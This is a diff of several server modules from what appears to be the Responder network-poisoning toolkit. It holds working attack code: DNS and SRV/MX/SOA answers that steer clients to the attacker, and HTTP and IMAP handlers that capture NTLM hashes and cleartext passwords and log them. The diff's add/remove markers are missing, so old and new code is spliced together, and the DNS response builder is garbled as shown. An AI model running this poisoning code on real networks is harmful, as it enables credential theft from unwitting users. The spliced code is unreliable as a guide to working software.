'type': 'Interesting-Query',
'client': self.client_address[0].replace('::ffff:', ''),
'hostname': query_name,
'fullhash': query_name
})
# Respond to everything that passed the filters
return True
def build_response(self, transaction_id, query_name, query_type, query_class, original_data, opt_record=None):
"""Build DNS response packet with optional OPT record support"""
try:
data = self.request.recv(1024)
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "A":
buff = DNS_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
self.request.send(NetworkSendBufferPython2or3(buff))
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] A Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv4":
buff = DNS_AnsOPT()
buff.calculate(NetworkRecvBufferPython2or3(data))
self.request.send(NetworkSendBufferPython2or3(buff))
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] A OPT Record poisoned answer sent to: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
# DNS Header
response = transaction_id # Transaction ID
# Flags: Response, Authoritative, No error
flags = 0x8400 # Standard query response, authoritative
response += struct.pack('>H', flags)
# Questions, Answers, Authority RRs, Additional RRs
response += struct.pack('>H', 1) # 1 question
response += struct.pack('>H', 1) # 1 answer
response += struct.pack('>H', 0) # 0 authority
# Additional RRs count (1 if we have OPT record)
additional_count = 1 if opt_record else 0
response += struct.pack('>H', additional_count)
# Question section (copy from original query)
# Find question section in original data
question_start = 12
question_end = question_start
# Skip to end of domain name
while question_end < len(original_data):
length = original_data[question_end]
if length == 0:
question_end += 5 # null byte + type (2) + class (2)
break
if (length & 0xC0) == 0xC0:
question_end += 6 # pointer (2) + type (2) + class (2)
break
question_end += length + 1
question_section = original_data[question_start:question_end]
response += question_section
# Answer section
# Name (pointer to question)
response += b'\xc0\x0c' # Pointer to offset 12 (question name)
# Type
response += struct.pack('>H', query_type)
# Class
response += struct.pack('>H', query_class)
# TTL (5 minutes for better caching while still allowing updates)
response += struct.pack('>I', 300) # 300 seconds = 5 minutes
# Get target IP for A records
target_ipv4 = self.get_ipv4_address()
if query_type == 1: # A record
# RDLENGTH
response += struct.pack('>H', 4)
# RDATA (IPv4 address)
response += socket.inet_aton(target_ipv4)
elif query_type == 28: # AAAA record
# Get proper IPv6 address (already validated in should_respond)
ipv6 = self.get_ipv6_address()
if not ipv6:
return None # Should not happen if should_respond worked
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "SRV":
buff = DNS_SRV_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
self.request.send(NetworkSendBufferPython2or3(buff))
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] SRV Record poisoned answer sent: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
# RDLENGTH
response += struct.pack('>H', 16)
# RDATA (IPv6 address)
response += socket.inet_pton(socket.AF_INET6, ipv6)
elif query_type == 6: # SOA record (Start of Authority)
# Build SOA record to appear authoritative
# SOA format: MNAME RNAME SERIAL REFRESH RETRY EXPIRE MINIMUM
# MNAME (primary nameserver) - pointer to query name
soa_data = b'\xc0\x0c'
# RNAME (responsible party) - admin@<domain>
# Format: admin.<domain> (@ becomes .)
soa_data += b'\x05admin\xc0\x0c' # admin + pointer to query name
# SERIAL (zone serial number)
import time
serial = int(time.time()) % 2147483647 # Use timestamp as serial
soa_data += struct.pack('>I', serial)
# REFRESH (32-bit seconds) - how often secondary checks for updates
soa_data += struct.pack('>I', 120) # 2 minutes
# RETRY (32-bit seconds) - retry interval if refresh fails
soa_data += struct.pack('>I', 60) # 1 minute
# EXPIRE (32-bit seconds) - when zone data becomes invalid
soa_data += struct.pack('>I', 300) # 5 minutes
# MINIMUM (32-bit seconds) - minimum TTL for negative caching
soa_data += struct.pack('>I', 60) # 60 seconds
response += struct.pack('>H', len(soa_data))
response += soa_data
if settings.Config.Verbose:
print(color('[DNS] SOA record poisoned - appearing as authoritative', 3, 1))
elif query_type == 15: # MX record (mail server)
# Build MX record pointing to our server
# This captures SMTP auth attempts
mx_data = struct.pack('>H', 10) # Priority 10
mx_data += b'\xc0\x0c' # Pointer to query name (our server)
response += struct.pack('>H', len(mx_data))
response += mx_data
if settings.Config.Verbose:
print(color('[DNS] MX record poisoned - potential email auth capture', 3, 1))
elif query_type == 16: # TXT record
# Return a benign TXT record
txt_data = b'v=spf1 a mx ~all' # SPF record
response += struct.pack('>H', len(txt_data) + 1)
response += struct.pack('B', len(txt_data))
response += txt_data
elif query_type == 33: # SRV record (service discovery)
# SRV format: priority, weight, port, target
# Determine correct port based on service name in query
srv_port = self.get_srv_port(query_name)
srv_data = struct.pack('>HHH', 0, 0, srv_port) # priority, weight, port
srv_data += b'\xc0\x0c' # Target (pointer to query name)
response += struct.pack('>H', len(srv_data))
response += srv_data
if settings.Config.Verbose:
print(color('[DNS] SRV record poisoned: %s -> port %d' % (query_name, srv_port), 3, 1))
elif query_type == 255: # ANY query
# Respond with A record
response += struct.pack('>H', 4)
response += socket.inet_aton(target_ipv4)
elif query_type == 64 or query_type == 65: # SVCB (64) or HTTPS (65) record
# Service Binding records - respond with alias to same domain
# This tells clients to use A/AAAA records for the service
# SVCB format: priority, target, params
# Priority 0 = AliasMode (just use A/AAAA of target)
svcb_data = struct.pack('>H', 0) # Priority 0 (alias)
# Target: pointer to query name (use our domain)
svcb_data += b'\xc0\x0c' # Pointer to query name
response += struct.pack('>H', len(svcb_data))
response += svcb_data
if settings.Config.Verbose:
record_type = 'HTTPS' if query_type == 65 else 'SVCB'
print(color('[DNS] %s record poisoned - alias mode' % record_type, 3, 1))
# Add OPT record to additional section if client sent one
if opt_record:
response += self.build_opt_record(opt_record)
return response
except Exception as e:
if settings.Config.Verbose:
print(text('[DNS] Error building response: %s' % str(e)))
return None
def build_opt_record(self, client_opt):
"""
Build OPT pseudo-RR for EDNS0 response
This indicates our server supports EDNS0 extensions
"""
try:
opt_rr = b''
# NAME: root domain (empty)
opt_rr += b'\x00'
# TYPE: OPT (41)
opt_rr += struct.pack('>H', 41)
# CLASS: UDP payload size we support (typically 4096 or 512)
# Match client's size or use reasonable default
udp_size = min(client_opt['udp_size'], 4096) if client_opt['udp_size'] > 512 else 4096
opt_rr += struct.pack('>H', udp_size)
# TTL: Extended RCODE and flags
# Byte 0: Extended RCODE (0 = no error)
# Byte 1: EDNS version (0)
# Bytes 2-3: Flags (we don't set DNSSEC OK in response)
extended_rcode = 0
edns_version = 0
flags = 0 # No flags set (we don't support DNSSEC)
opt_rr += struct.pack('B', extended_rcode)
opt_rr += struct.pack('B', edns_version)
opt_rr += struct.pack('>H', flags)
# RDLENGTH: 0 (no additional options)
opt_rr += struct.pack('>H', 0)
# RDATA: empty (no options)
if settings.Config.Verbose:
print(color('[DNS] Added OPT record to response (EDNS0)', 4, 1))
return opt_rr
except Exception as e:
if settings.Config.Verbose:
print(text('[DNS] Error building OPT record: %s' % str(e)))
return b''
def get_target_ip(self, query_type):
"""Get the target IP address for spoofed responses"""
if query_type == 28: # AAAA
return self.get_ipv6_address()
else: # A record and others
return self.get_ipv4_address()
def get_ipv4_address(self):
"""Get IPv4 address for A record responses"""
# Priority 1: Use ExternalIP if set (-e option)
if hasattr(settings.Config, 'ExternalIP') and settings.Config.ExternalIP:
return settings.Config.ExternalIP
# Priority 2: Use Bind_To (default)
return settings.Config.Bind_To
def get_ipv6_address(self):
"""
Get IPv6 address for AAAA responses
Returns the IPv6 address Responder is configured to use:
1. ExternalIP6 if set (-6 command line option)
2. Bind_To6 (already determined by FindLocalIP6 at startup)
Does NOT return IPv4-mapped addresses (::ffff:x.x.x.x) or localhost.
"""
# Priority 1: Use ExternalIP6 if set (-6 command line option)
if hasattr(settings.Config, 'ExternalIP6') and settings.Config.ExternalIP6:
ipv6 = settings.Config.ExternalIP6
if ipv6 and ipv6 not in ('::1', '') and not ipv6.startswith('::ffff:'):
return ipv6
# Priority 2: Use Bind_To6 (set by FindLocalIP6 at startup)
if hasattr(settings.Config, 'Bind_To6') and settings.Config.Bind_To6:
ipv6 = settings.Config.Bind_To6
if ipv6 and ipv6 not in ('::1', '::') and not ipv6.startswith('::ffff:'):
return ipv6
# No valid IPv6 available
return None
def get_type_name(self, query_type):
"""Convert query type number to name"""
types = {
1: 'A',
2: 'NS',
5: 'CNAME',
6: 'SOA',
12: 'PTR',
15: 'MX',
16: 'TXT',
28: 'AAAA',
33: 'SRV',
41: 'OPT',
64: 'SVCB',
65: 'HTTPS',
255: 'ANY'
}
return types.get(query_type, 'TYPE%d' % query_type)
def get_srv_port(self, query_name):
"""
Determine the correct port for SRV record responses based on service name.
SRV query format: _service._protocol.name
Examples:
_ldap._tcp.dc._msdcs.domain.local → 389
_kerberos._tcp.domain.local → 88
_gc._tcp.domain.local → 3268
Returns appropriate port for the service, defaults to 445 (SMB) if unknown.
"""
query_lower = query_name.lower()
# Service to port mapping
# Format: (service_pattern, port)
srv_ports = [
# LDAP services
('_ldap._tcp', 389),
('_ldap._udp', 389),
('_ldaps._tcp', 636),
# Kerberos services
('_kerberos._tcp', 88),
('_kerberos._udp', 88),
('_kerberos-master._tcp', 88),
('_kerberos-master._udp', 88),
('_kpasswd._tcp', 464),
('_kpasswd._udp', 464),
('_kerberos-adm._tcp', 749),
# Global Catalog (Active Directory)
('_gc._tcp', 3268),
('_gc._ssl._tcp', 3269),
# Web services
('_http._tcp', 80),
('_https._tcp', 443),
('_http._ssl._tcp', 443),
# Email services
('_smtp._tcp', 25),
('_submission._tcp', 587),
('_imap._tcp', 143),
('_imaps._tcp', 993),
('_pop3._tcp', 110),
('_pop3s._tcp', 995),
# File/Remote services
('_smb._tcp', 445),
('_cifs._tcp', 445),
('_ftp._tcp', 21),
('_sftp._tcp', 22),
('_ssh._tcp', 22),
('_telnet._tcp', 23),
('_rdp._tcp', 3389),
('_ms-wbt-server._tcp', 3389), # RDP
# Windows services
('_winrm._tcp', 5985),
('_winrm-ssl._tcp', 5986),
('_wsman._tcp', 5985),
('_ntp._udp', 123),
# Database services
('_mssql._tcp', 1433),
('_mysql._tcp', 3306),
('_postgresql._tcp', 5432),
('_oracle._tcp', 1521),
# SIP/VoIP
('_sip._tcp', 5060),
('_sip._udp', 5060),
('_sips._tcp', 5061),
# XMPP/Jabber
('_xmpp-client._tcp', 5222),
('_xmpp-server._tcp', 5269),
# Other
('_finger._tcp', 79),
('_ipp._tcp', 631), # Internet Printing Protocol
]
# Check each pattern
for pattern, port in srv_ports:
if query_lower.startswith(pattern):
return port
# Default to SMB port for unknown services
# This is a reasonable default for credential capture
return 445
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "IPv6":
buff = DNS6_Ans()
buff.calculate(NetworkRecvBufferPython2or3(data))
self.request.send(NetworkSendBufferPython2or3(buff))
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] AAAA Record poisoned answer sent: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
if ParseDNSType(NetworkRecvBufferPython2or3(data)) == "OPTIPv6":
buff = DNS6_AnsOPT()
buff.calculate(NetworkRecvBufferPython2or3(data))
self.request.send(NetworkSendBufferPython2or3(buff))
ResolveName = re.sub('[^0-9a-zA-Z]+', '.', buff.fields["QuestionName"])
print(color("[*] [DNS] AAAA OPT Record poisoned answer sent: %-15s Requested name: %s" % (self.client_address[0].replace("::ffff:",""), ResolveName), 2, 1))
except Exception:
pass
class DNSTCP(BaseRequestHandler):
"""
DNS over TCP server
Handles TCP-based DNS queries (zone transfers, large responses)
"""
def handle(self):
try:
# TCP DNS messages are prefixed with 2-byte length
length_data = self.request.recv(2)
if len(length_data) < 2:
return
msg_length = struct.unpack('>H', length_data)[0]
# Receive the DNS message
data = b''
while len(data) < msg_length:
chunk = self.request.recv(msg_length - len(data))
if not chunk:
return
data += chunk
if len(data) < 12:
return
# Parse DNS header
transaction_id = data[0:2]
flags = struct.unpack('>H', data[2:4])[0]
questions = struct.unpack('>H', data[4:6])[0]
answer_rrs = struct.unpack('>H', data[6:8])[0]
authority_rrs = struct.unpack('>H', data[8:10])[0]
additional_rrs = struct.unpack('>H', data[10:12])[0]
# Check if it's a query
if flags & 0x8000:
return
# Create DNS instance to reuse parsing logic
dns_handler = DNS.__new__(DNS)
dns_handler.client_address = self.client_address
# Parse question
query_name, query_type, query_class, offset = dns_handler.parse_question(data, 12)
if not query_name:
return
# Check for OPT record
opt_record = None
if additional_rrs > 0:
opt_record = dns_handler.parse_opt_record(data, offset)
# Log the query
if settings.Config.Verbose:
query_type_name = dns_handler.get_type_name(query_type)
opt_info = ''
if opt_record:
opt_info = ' [EDNS0: UDP=%d]' % opt_record['udp_size']
print(text('[DNS-TCP] Query from %s: %s (%s)%s' % (
self.client_address[0].replace('::ffff:', ''),
query_name,
query_type_name,
opt_info
)))
# Check if we should respond
if not dns_handler.should_respond(query_name, query_type):
return
# Build response
response = dns_handler.build_response(
transaction_id,
query_name,
query_type,
query_class,
data,
opt_record
)
if response:
# Prefix with length for TCP
tcp_response = struct.pack('>H', len(response)) + response
self.request.sendall(tcp_response)
target_ip = dns_handler.get_target_ip(query_type)
if target_ip:
print(color('[DNS-TCP] Poisoned response: %s -> %s' % (
query_name, target_ip), 2, 1))
except Exception as e:
if settings.Config.Verbose:
print(text('[DNS-TCP] Error: %s' % str(e)))

2
servers/FTP.py
View File

@@ -55,5 +55,5 @@ class FTP(BaseRequestHandler):
data = self.request.recv(1024)
except Exception:
raise
self.request.close()
pass

64
servers/HTTP.py Executable file → Normal file
View File

@@ -96,26 +96,9 @@ def GrabReferer(data, host):
return Referer
return False
def SpotFirefox(data):
UserAgent = re.findall(r'(?<=User-Agent: )[^\r]*', data)
if UserAgent:
print(text("[HTTP] %s" % color("User-Agent : "+UserAgent[0], 2)))
IsFirefox = re.search('Firefox', UserAgent[0])
if IsFirefox:
print(color("[WARNING]: Mozilla doesn't switch to fail-over proxies (as it should) when one's failing.", 1))
print(color("[WARNING]: The current WPAD script will cause disruption on this host. Sending a dummy wpad script (DIRECT connect)", 1))
return True
else:
return False
def WpadCustom(data, client):
Wpad = re.search(r'(/wpad.dat|/*\.pac)', data)
if Wpad and SpotFirefox(data):
Buffer = WPADScript(Payload="function FindProxyForURL(url, host){return 'DIRECT';}")
Buffer.calculate()
return str(Buffer)
if Wpad and SpotFirefox(data) == False:
if Wpad:
Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
Buffer.calculate()
return str(Buffer)
@@ -167,6 +150,7 @@ def GrabURL(data, host):
# Handle HTTP packet sequence.
def PacketSequence(data, client, Challenge):
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
NTLM_Auth2 = re.findall(r'(?<=Authorization: Negotiate )[^\r]*', data)
Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
# Serve the .exe if needed
@@ -193,7 +177,7 @@ def PacketSequence(data, client, Challenge):
Buffer.calculate()
Buffer_Ans = IIS_NTLM_Challenge_Ans(Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
#Buffer_Ans.calculate(Buffer)
Buffer_Ans.calculate()
return Buffer_Ans
if Packet_NTLM == b'\x03':
@@ -212,6 +196,36 @@ def PacketSequence(data, client, Challenge):
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return Buffer
elif NTLM_Auth2:
Packet_NTLM = b64decode(''.join(NTLM_Auth2))[8:9]
if Packet_NTLM == b'\x01':
GrabURL(data, client)
#GrabReferer(data, client)
GrabCookie(data, client)
Buffer = NTLM_Challenge(ServerChallenge=NetworkRecvBufferPython2or3(Challenge))
Buffer.calculate()
Buffer_Ans = IIS_NTLM_Challenge_Ans(WWWAuth = "WWW-Authenticate: Negotiate ", Payload = b64encode(NetworkSendBufferPython2or3(Buffer)).decode('latin-1'))
Buffer_Ans.calculate()
return Buffer_Ans
if Packet_NTLM == b'\x03':
NTLM_Auth = b64decode(''.join(NTLM_Auth2))
if IsWebDAV(data):
module = "WebDAV"
else:
module = "HTTP"
ParseHTTPHash(NTLM_Auth, Challenge, client, module)
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
print(text("[HTTP] WPAD (auth) file sent to %s" % client.replace("::ffff:","")))
return WPAD_Custom
else:
Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
Buffer.calculate()
return Buffer
elif Basic_Auth:
ClearText_Auth = b64decode(''.join(Basic_Auth))
@@ -224,8 +238,8 @@ def PacketSequence(data, client, Challenge):
'module': 'HTTP',
'type': 'Basic',
'client': client,
'user': ClearText_Auth.decode('latin-1').split(':')[0],
'cleartext': ClearText_Auth.decode('latin-1').split(':')[1],
'user': ClearText_Auth.decode('latin-1').split(':', maxsplit=1)[0],
'cleartext': ClearText_Auth.decode('latin-1').split(':', maxsplit=1)[1],
})
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
@@ -239,12 +253,16 @@ def PacketSequence(data, client, Challenge):
return Buffer
else:
if settings.Config.Basic:
Response = IIS_Basic_401_Ans()
r = IIS_Basic_401_Ans()
r.calculate()
Response = r
if settings.Config.Verbose:
print(text("[HTTP] Sending BASIC authentication request to %s" % client.replace("::ffff:","")))
else:
Response = IIS_Auth_401_Ans()
r = IIS_Auth_401_Ans()
r.calculate()
Response = r
if settings.Config.Verbose:
print(text("[HTTP] Sending NTLM authentication request to %s" % client.replace("::ffff:","")))

603
servers/IMAP.py
View File

@@ -1,7 +1,7 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# email: lgaffie@secorizon.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
@@ -15,34 +15,609 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import base64
import re
import struct
import os
import ssl
from utils import *
if (sys.version_info > (3, 0)):
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
from packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd
class IMAP(BaseRequestHandler):
def __init__(self, *args, **kwargs):
self.tls_enabled = False
BaseRequestHandler.__init__(self, *args, **kwargs)
def upgrade_to_tls(self):
"""Upgrade connection to TLS using Responder's SSL certificates"""
try:
# Get SSL certificate paths from Responder config
cert_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLCert)
key_path = os.path.join(settings.Config.ResponderPATH, settings.Config.SSLKey)
if not os.path.exists(cert_path) or not os.path.exists(key_path):
if settings.Config.Verbose:
print(text('[IMAP] SSL certificates not found'))
return False
# Create SSL context
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(cert_path, key_path)
# Wrap socket
self.request = context.wrap_socket(self.request, server_side=True)
self.tls_enabled = True
if settings.Config.Verbose:
print(text('[IMAP] Successfully upgraded to TLS from %s' %
self.client_address[0].replace("::ffff:", "")))
return True
except Exception as e:
if settings.Config.Verbose:
print(text('[IMAP] TLS upgrade failed: %s' % str(e)))
return False
def send_capability(self, tag="*"):
"""Send CAPABILITY response with STARTTLS if not already in TLS"""
if self.tls_enabled:
# After STARTTLS, don't advertise it again
self.request.send(NetworkSendBufferPython2or3(IMAPCapability()))
else:
# Before STARTTLS, advertise it
capability = "* CAPABILITY IMAP4 IMAP4rev1 AUTH=PLAIN AUTH=LOGIN AUTH=NTLM STARTTLS\r\n"
self.request.send(NetworkSendBufferPython2or3(capability))
if tag != "*":
self.request.send(NetworkSendBufferPython2or3(IMAPCapabilityEnd(Tag=tag)))
def handle(self):
try:
# Send greeting
self.request.send(NetworkSendBufferPython2or3(IMAPGreeting()))
data = self.request.recv(1024)
if data[5:15] == b'CAPABILITY':
RequestTag = data[0:4]
self.request.send(NetworkSendBufferPython2or3(IMAPCapability()))
self.request.send(NetworkSendBufferPython2or3(IMAPCapabilityEnd(Tag=RequestTag.decode("latin-1"))))
# Main loop to handle multiple commands
while True:
data = self.request.recv(1024)
if data[5:10] == b'LOGIN':
Credentials = data[10:].strip().decode("latin-1").split('"')
if not data:
break
# Handle CAPABILITY command
if b'CAPABILITY' in data.upper():
RequestTag = self.extract_tag(data)
self.send_capability(RequestTag)
continue
# Handle STARTTLS command
if b'STARTTLS' in data.upper():
RequestTag = self.extract_tag(data)
if self.tls_enabled:
# Already in TLS
response = "%s BAD STARTTLS already in TLS\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
continue
# Send OK response before upgrading
response = "%s OK Begin TLS negotiation now\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
# Upgrade to TLS
if not self.upgrade_to_tls():
# TLS upgrade failed, close connection
break
# Continue handling commands over TLS
continue
# Handle LOGIN command
if b'LOGIN' in data.upper():
success = self.handle_login(data)
if success:
break
continue
# Handle AUTHENTICATE PLAIN
if b'AUTHENTICATE PLAIN' in data.upper():
success = self.handle_authenticate_plain(data)
if success:
break
continue
# Handle AUTHENTICATE LOGIN
if b'AUTHENTICATE LOGIN' in data.upper():
success = self.handle_authenticate_login(data)
if success:
break
continue
# Handle AUTHENTICATE NTLM
if b'AUTHENTICATE NTLM' in data.upper():
success = self.handle_authenticate_ntlm(data)
if success:
break
continue
# Handle LOGOUT
if b'LOGOUT' in data.upper():
RequestTag = self.extract_tag(data)
response = "* BYE IMAP4 server logging out\r\n"
response += "%s OK LOGOUT completed\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
break
# Unknown command - send error
RequestTag = self.extract_tag(data)
response = "%s BAD Command not recognized\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
except Exception as e:
if settings.Config.Verbose:
print(text('[IMAP] Exception: %s' % str(e)))
pass
def extract_tag(self, data):
"""Extract IMAP command tag (e.g., 'A001' from 'A001 LOGIN ...')"""
try:
parts = data.decode('latin-1', errors='ignore').split()
if parts:
return parts[0]
except:
pass
return "A001"
def handle_login(self, data):
"""
Handle LOGIN command
Format: TAG LOGIN username password
Credentials can be quoted or unquoted
"""
try:
RequestTag = self.extract_tag(data)
# Decode the data
data_str = data.decode('latin-1', errors='ignore').strip()
# Remove tag and LOGIN command
# Pattern: TAG LOGIN credentials
login_match = re.search(r'LOGIN\s+(.+)', data_str, re.IGNORECASE)
if not login_match:
response = "%s BAD LOGIN command syntax error\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
return False
credentials_part = login_match.group(1).strip()
# Parse credentials - can be quoted or unquoted
username, password = self.parse_credentials(credentials_part)
if username and password:
# Save credentials
SaveToDb({
'module': 'IMAP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': Credentials[1],
'cleartext': Credentials[3],
'fullhash': Credentials[1]+":"+Credentials[3],
'user': username,
'cleartext': password,
'fullhash': username + ":" + password,
})
if settings.Config.Verbose:
print(text('[IMAP] LOGIN captured: %s:%s from %s' % (
username, password, self.client_address[0])))
# Send success but then close
response = "%s OK LOGIN completed\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
return True
else:
# Invalid credentials format
response = "%s BAD LOGIN credentials format error\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
return False
except Exception as e:
return False
def parse_credentials(self, creds_str):
"""
Parse username and password from LOGIN command
Supports: "user" "pass", user pass, {5}user {8}password (literal strings)
"""
try:
# Method 1: Quoted strings "user" "pass"
quoted_match = re.findall(r'"([^"]*)"', creds_str)
if len(quoted_match) >= 2:
return quoted_match[0], quoted_match[1]
# Method 2: Space-separated (unquoted)
parts = creds_str.split()
if len(parts) >= 2:
# Remove any curly brace literals {5}
user = re.sub(r'^\{\d+\}', '', parts[0])
passwd = re.sub(r'^\{\d+\}', '', parts[1])
return user, passwd
return None, None
except:
return None, None
def handle_authenticate_plain(self, data):
"""Handle AUTHENTICATE PLAIN command - can be single-line or multi-line"""
try:
RequestTag = self.extract_tag(data)
data_str = data.decode('latin-1', errors='ignore').strip()
plain_match = re.search(r'AUTHENTICATE\s+PLAIN\s+(.+)', data_str, re.IGNORECASE)
if plain_match:
b64_creds = plain_match.group(1).strip()
else:
response = "+\r\n"
self.request.send(NetworkSendBufferPython2or3(response))
cred_data = self.request.recv(1024)
if not cred_data:
return False
b64_creds = cred_data.decode('latin-1', errors='ignore').strip()
try:
decoded = base64.b64decode(b64_creds).decode('latin-1', errors='ignore')
parts = decoded.split('\x00')
if len(parts) >= 3:
username = parts[1]
password = parts[2]
elif len(parts) >= 2:
username = parts[0]
password = parts[1]
else:
raise ValueError("Invalid PLAIN format")
if username and password:
SaveToDb({
'module': 'IMAP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': username,
'cleartext': password,
'fullhash': username + ":" + password,
})
if settings.Config.Verbose:
print(text('[IMAP] AUTHENTICATE PLAIN captured: %s:%s from %s' % (
username, password, self.client_address[0])))
response = "%s OK AUTHENTICATE completed\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
return True
except Exception as e:
response = "%s NO AUTHENTICATE failed\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
return False
except Exception as e:
return False
def handle_authenticate_login(self, data):
"""Handle AUTHENTICATE LOGIN command - prompts for username, then password"""
try:
RequestTag = self.extract_tag(data)
response = "+ " + base64.b64encode(b"Username:").decode('latin-1') + "\r\n"
self.request.send(NetworkSendBufferPython2or3(response))
user_data = self.request.recv(1024)
if not user_data:
return False
username_b64 = user_data.decode('latin-1', errors='ignore').strip()
username = base64.b64decode(username_b64).decode('latin-1', errors='ignore')
response = "+ " + base64.b64encode(b"Password:").decode('latin-1') + "\r\n"
self.request.send(NetworkSendBufferPython2or3(response))
pass_data = self.request.recv(1024)
if not pass_data:
return False
password_b64 = pass_data.decode('latin-1', errors='ignore').strip()
password = base64.b64decode(password_b64).decode('latin-1', errors='ignore')
if username and password:
SaveToDb({
'module': 'IMAP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': username,
'cleartext': password,
'fullhash': username + ":" + password,
})
if settings.Config.Verbose:
print(text('[IMAP] AUTHENTICATE LOGIN captured: %s:%s from %s' % (
username, password, self.client_address[0])))
response = "%s OK AUTHENTICATE completed\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
return True
else:
response = "%s NO AUTHENTICATE failed\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
return False
except Exception as e:
return False
def handle_authenticate_ntlm(self, data):
"""Handle AUTHENTICATE NTLM command - implements challenge-response"""
try:
RequestTag = self.extract_tag(data)
response = "+\r\n"
self.request.send(NetworkSendBufferPython2or3(response))
type1_data = self.request.recv(2048)
if not type1_data:
return False
type1_b64 = type1_data.decode('latin-1', errors='ignore').strip()
try:
type1_msg = base64.b64decode(type1_b64)
except:
return False
type2_msg = self.generate_ntlm_type2()
type2_b64 = base64.b64encode(type2_msg).decode('latin-1')
response = "+ %s\r\n" % type2_b64
self.request.send(NetworkSendBufferPython2or3(response))
type3_data = self.request.recv(4096)
if not type3_data:
return False
type3_b64 = type3_data.decode('latin-1', errors='ignore').strip()
if type3_b64 == '*' or type3_b64 == '':
if settings.Config.Verbose:
print(text('[IMAP] Client cancelled NTLM authentication'))
response = "%s NO AUTHENTICATE cancelled\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
return False
if not all(c in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\r\n' for c in type3_b64):
response = "%s NO AUTHENTICATE failed\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
return False
try:
type3_msg = base64.b64decode(type3_b64)
except Exception as e:
response = "%s NO AUTHENTICATE failed\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
return False
ntlm_hash = self.parse_ntlm_type3(type3_msg, type2_msg)
if ntlm_hash:
if settings.Config.Verbose:
print(text('[IMAP] NTLM hash captured: %s from %s' % (
ntlm_hash['user'], self.client_address[0])))
SaveToDb(ntlm_hash)
response = "%s OK AUTHENTICATE completed\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
return True
else:
response = "%s NO AUTHENTICATE failed\r\n" % RequestTag
self.request.send(NetworkSendBufferPython2or3(response))
return False
except Exception as e:
return False
def generate_ntlm_type2(self):
"""Generate NTLM Type 2 (Challenge) message with target info for NTLMv2"""
import time
challenge = os.urandom(8)
self.ntlm_challenge = challenge
target_name = b'W\x00O\x00R\x00K\x00G\x00R\x00O\x00U\x00P\x00'
target_name_len = len(target_name)
target_info = b''
domain_name = b'W\x00O\x00R\x00K\x00G\x00R\x00O\x00U\x00P\x00'
target_info += struct.pack('<HH', 0x0002, len(domain_name))
target_info += domain_name
computer_name = b'S\x00E\x00R\x00V\x00E\x00R\x00'
target_info += struct.pack('<HH', 0x0001, len(computer_name))
target_info += computer_name
dns_domain = b'w\x00o\x00r\x00k\x00g\x00r\x00o\x00u\x00p\x00'
target_info += struct.pack('<HH', 0x0004, len(dns_domain))
target_info += dns_domain
dns_computer = b's\x00e\x00r\x00v\x00e\x00r\x00'
target_info += struct.pack('<HH', 0x0003, len(dns_computer))
target_info += dns_computer
timestamp = int((time.time() + 11644473600) * 10000000)
target_info += struct.pack('<HH', 0x0007, 8)
target_info += struct.pack('<Q', timestamp)
target_info += struct.pack('<HH', 0x0000, 0)
target_info_len = len(target_info)
target_name_offset = 48
target_info_offset = target_name_offset + target_name_len
signature = b'NTLMSSP\x00'
